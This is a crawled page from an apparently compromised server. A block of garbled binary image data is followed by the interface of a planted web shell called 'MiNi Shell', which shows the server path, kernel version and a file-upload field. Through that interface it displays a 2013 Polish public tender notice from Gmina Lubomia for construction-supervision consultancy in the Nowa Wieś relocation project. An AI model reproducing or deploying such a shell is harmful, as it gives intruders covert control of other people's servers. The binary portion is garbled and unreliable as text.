JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130527/204524-N-2013.html

<p class="kh_header"><b>Lubomia: Nr Ident. Projektu No.  P086768
Usługi Konsultanta Kontrakt No. ORFPP A3-7

 Nadzór budowlany, włącznie z wykonywaniem funkcji Inżyniera
Kontraktu i usługami Zarządzania Kontraktem i projektowania w ramach projektu: 
Budowy Infrastruktury Drogowej i Technicznej oraz Gminnej na Terenie Nowej Wsi.</b><br>
<b>Numer ogłoszenia: 204524 - 2013; data zamieszczenia: 27.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubomia , ul. Szkolna 1, 44-360 Lubomia, woj. śląskie, tel. 032 4516614/ 4516128, faks 032 4516614.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lubomia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nr Ident. Projektu No.  P086768
Usługi Konsultanta Kontrakt No. ORFPP A3-7

 Nadzór budowlany, włącznie z wykonywaniem funkcji Inżyniera
Kontraktu i usługami Zarządzania Kontraktem i projektowania w ramach projektu: 
Budowy Infrastruktury Drogowej i Technicznej oraz Gminnej na Terenie Nowej Wsi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Niniejsze Wezwanie do Wyrażenia Zainteresowania następuje po Ogłoszeniu o przetargu otwartym (GPN) opublikowanym w Development Business Narodów Zjednoczonych w dniu 27.5.2013 r.
Rząd Rzeczpospolitej Polskiej otrzymał Pożyczki i Pomoc na wdrożenie Programu Ochrony Przeciwpowodziowej Dorzecza Odry w kwocie wynoszącej razem 505 milionów euro.  Projekt jest finansowany pożyczką z Międzynarodowego Banku Odbudowy i Rozwoju (MBOiR), pożyczką z Banku Rozwoju Rady Europy (BRRE) i środkami z Funduszu Spójności UE.
Projekt składa się z następujących komponentów:
Komponent A: Budowa Zbiornika Przeciwpowodziowego Racibórz;
Komponent B: Modernizacja Wrocławskiego Węzła Wodnego (WWW)
Komponent C: Poprawa Zarządzania Powodziowego, Monitoringu i Oceny 
Komponent D: Zarządzanie Projektem, Wsparcie Techniczne i Szkolenia 
Rząd Polski zamierza wydać część ze wspomnianych środków na płatności wynikające z Umowy na usługi Konsultanta w zakresie określonym w tytule niniejszego wezwania dotyczącego realizacji Nowej Wsi, przedsięwzięcia zarządzanego przez Gminę Lubomia.
Oczekiwany okres świadczenia usług to około 36 miesięcy. 
Cele usług konsultingowych
Głównym celem usług konsultingowych objętych Umową jest prowadzenie w imieniu Klienta wszelkich prac i działań związanych z budową infrastruktury technicznej, drogowej oraz gminnej na terenie Nowej Wsi. Konsultant wykonuje wszystkie czynności, do których Klient jest zobowiązany w ramach procesu budowlanego związanego z realizacją Inwestycji. 
Usługi Konsultanta składać się będą z następujących zadań, ale nie są do nich ograniczone:
Wykonanie projektów budowlanych i wykonawczych oraz uzyskanie pozwoleń na budowę dla następujących obiektów:
1.remiza strażacka ze świetlicą o powierzchni około 900 m2 ;
2.budynek zaplecza klubu sportowego o powierzchni około 800 m 2 wraz z jego wyposażeniem oraz zagospodarowaniem terenów sportowych o powierzchni około 2,2 ha (boiska i obiekty małej architektury);
3. cmentarz wraz z zagospodarowaniem o powierzchni około 0,68 ha oraz przeniesienie około 280 grobów z cmentarza w Nieboczowach;
4.zagospodarowanie parku o powierzchni około 4,50 ha;
5.zagospodarowanie terenów publicznych o powierzchni około 1,50 ha 
6.dom wielorodzinny o powierzchni około 650 m2 
7.przygotowanie dokumentacji niezbędnej do ekshumacji około 280 zwłok wraz z ich przeniesieniem oraz uzyskanie wszelkich niezbędnych do tego celu decyzji administracyjnych.
8. opracowanie programu przeniesienia lub odtworzenia (w zależności od stanu technicznego dotychczasowych obiektów) krzyży i kapliczek z Nieboczów i Ligoty Tworkowskiej do Nowej Wsi lub innego wskazanego miejsca.
Przygotowanie i przeprowadzenie zgodnie z obowiązującymi procedurami Banku Światowego - Krajowy Przetarg Nieograniczony (NBC) na wybór Wykonawców Robót Budowlanych infrastruktury gminnej o której mowa wyżej.
Wykonywanie funkcji Inżyniera Kontraktu zgodnie ze standardami Banku Światowego i standardami Międzynarodowej Federacji Inżynierów i Konsultantów (FIDIC) dla następujących zadań:
a. budowa oczyszczalni ścieków - na podstawie koncepcji programu funkcjonalno-użytkowego przekazanej przekazanego przez Klienta;
b. budowa infrastruktury technicznej Nowej Wsi - na podstawie projektów budowlanych przekazanych przez Klienta; w tym budowa sieci i przyłączy wodociągowych i kanalizacji sanitarnej, przebudowa kolidujących sieci elektroenergetycznych SN i NN wraz z oświetleniem dróg, przebudowa kolidujących sieci telekomunikacyjnych; budowa sieci kanalizacji deszczowej,
c. budowa układu drogowego Nowej Wsi - na podstawie projektów budowlanych przekazanych przez Klienta;
Kontrola kosztów inwestycji i rozliczanie poszczególnych inwestycji.

Konsultant będzie wypełniał wszystkie obowiązki Inżyniera zgodnie z Standardowymi Dokumentami przetargowymi Banku Światowego - Zamówienia Robót, maj 2006 zgodnie z rewizją (Warunki Ogólne).

Gmina Lubomia zaprasza firmy konsultingowe spełniające warunki (Konsultanci) do wyrażenia zainteresowania świadczeniem usług. Zainteresowani Konsultanci powinni przedstawić informacje wykazujące, że posiadają wymagane kwalifikacje i odpowiednie doświadczenie aby wykonywać Usługi. 

Kryteria kwalifikujące na krótką listę to:

1. Doświadczenie ogólne, zakres posiadanej wiedzy fachowej (wraz z referencjami) oraz liczba personelu stałego i ich doświadczenie zawodowe;
2. Doświadczenie konkretnie związane z tym projektem - opis pomyślnie zrealizowanych podobnych zadań (w zakresie rozwoju miast)  w okresie 10 lat przed publikacją niniejszego ogłoszenia;
3. Wykazanie, że Konsultant zrealizował przynajmniej 2 projekty w obszarach związanych z przedmiotem tego kontraktu w okresie 10 lat przed publikacją niniejszego ogłoszenia o wartości co najmniej 10 mln EUR każdy lub wyższej,
4.  Kluczowy personel w zespole zaproponowanym do realizacji zadania. Do zadań specjalistycznych: budowa cmentarza oraz przeniesienie grobów, konsultanci mogą zaproponować podkonsultantów uzupełniających ich własne doświadczenie.
Zwracamy uwagę Konsultantów na akapit 1.9 Dokumentu Banku Światowego Wytyczne: Wybór i zatrudnianie Konsultantów przez Pożyczkobiorców Banku Światowego , maj 2004, Poprawionymi 1 października 2006 i 1 maja 2010 (Wytyczne dla Konsultantów), określające politykę Banku Światowego dot. konfliktu interesów.  
W celu podniesienia kwalifikacji konsultanci mogą łączyć siły. Takie łączenie może mieć formę Joint Venture lub wykonywania usług konsultingowych jako pod-konsultant. W przypadku Joint Venture (JV), wszyscy członkowie JV będą oceniani razem w celu zakwalifikowania na krótką listę i będą ponosić wspólną odpowiedzialność za wykonanie zadania, jak i wspólnie podpiszą umowę, jeśli ich grupa JV otrzyma dany kontrakt. Zainteresowani konsultanci powinni we wniosku jasno wskazać strukturę takiego łączenia sił, jak i obowiązki partnerów i pod-konsultantów. Niejasne wyrażenia zainteresowania jeśli chodzi o w połączeniu z  i/lub w stowarzyszeniu z itd. mogą nie być rozważane przy kwalifikacji na krótka listę. Zasadą jest, że na jedną firmę przypada jedno wyrażenie zainteresowania, a firma konsultingowa może zdecydować, czy chce uczestniczyć w postępowaniu jako pod-konsultant czy jako indywidualny konsultant czy jako partner w Joint Venture. Prosimy zauważyć, że firm winna złożyć tylko jedno WZ (EOI) w tym samym procesie wyboru - czy to indywidualnie jako konsultant czy jako partner w Joint Venture. Żadna z firm nie może być pod-konsultantem w sytuacji, kiedy składa WZ (EOI) indywidualnie lub jako partner Joint Venture w tej samej procedurze wyboru. Firma, w sytuacji kiedy pełni funkcje pod-konsultanta u dowolnego konsultanta lub JV, może brać udział w postępowaniu u więcej niż jednego konsultanta, ale tylko działając jako pod-konsultant.Konsultanci zostaną wybrani zgodnie z metoda opartą na Najniższym Koszcie  (LCS), która została przedstawiona w Wytycznych dla Konsultantów:  Wybór i zatrudnianie Konsultantów przez Pożyczkobiorców Banku Światowego , z maja 2004, z uaktualnieniami z  1 października 2006 i 1 maja 2010..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.32.40.00-5, 71.35.61.00-9, 71.63.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Kryteria kwalifikujące na krótką listę to:

1. Doświadczenie ogólne, zakres posiadanej wiedzy fachowej (wraz z referencjami) oraz liczba personelu stałego i ich doświadczenie zawodowe;
2. Doświadczenie konkretnie związane z tym projektem - opis pomyślnie zrealizowanych podobnych zadań (w zakresie rozwoju miast)  w okresie 10 lat przed publikacją niniejszego ogłoszenia;
3. Wykazanie, że Konsultant zrealizował przynajmniej 2 projekty w obszarach związanych z przedmiotem tego kontraktu w okresie 10 lat przed publikacją niniejszego ogłoszenia o wartości co najmniej 10 mln EUR każdy lub wyższej,
4.  Kluczowy personel w zespole zaproponowanym do realizacji zadania. Do zadań specjalistycznych: budowa cmentarza oraz przeniesienie grobów, konsultanci mogą zaproponować podkonsultantów uzupełniających ich własne doświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Więcej informacji można uzyskać pod poniższym adresem w godzinach pracy od 08:00 do 14:00.
Osobami wyznaczonymi do kontaktów z zainteresowanymi są: Maria Kołodziejska, Roman Lisiecki.
Wyrażenie zainteresowania musi zostać dostarczone w formie pisemnej - w języku angielskim                lub polskim - na poniższy adres (czy to osobiście czy pocztą czy faksem czy też mailem)                              w terminie  do dnia 11.6.2013 r.
Urząd Gminy Lubomia
Adres: ul. Szkolna1, 44-360  Lubomia, Polska

Tel:.  +48 32 4516 128, +48 32 4516 614; 
fax: +48 32 4516 128 wew. 21, +48 32 4516 614 wew. 21,

E-mail: lubomia@lubomia.pl

Internet: www.lubomia.pl</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.8</li>
<li>2 - Jakość - 0.2</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2013 godzina 15:00, miejsce: Urząd Gminy Lubomia
Adres: ul. Szkolna1, 44-360  Lubomia, 
Polska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Rząd Rzeczpospolitej Polskiej otrzymał Pożyczki i Pomoc na wdrożenie Programu Ochrony Przeciwpowodziowej Dorzecza Odry w kwocie wynoszącej razem 505 milionów euro.  Projekt jest finansowany pożyczką z Międzynarodowego Banku Odbudowy i Rozwoju (MBOiR), pożyczką z Banku Rozwoju Rady Europy (BRRE) i środkami z Funduszu Spójności UE..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com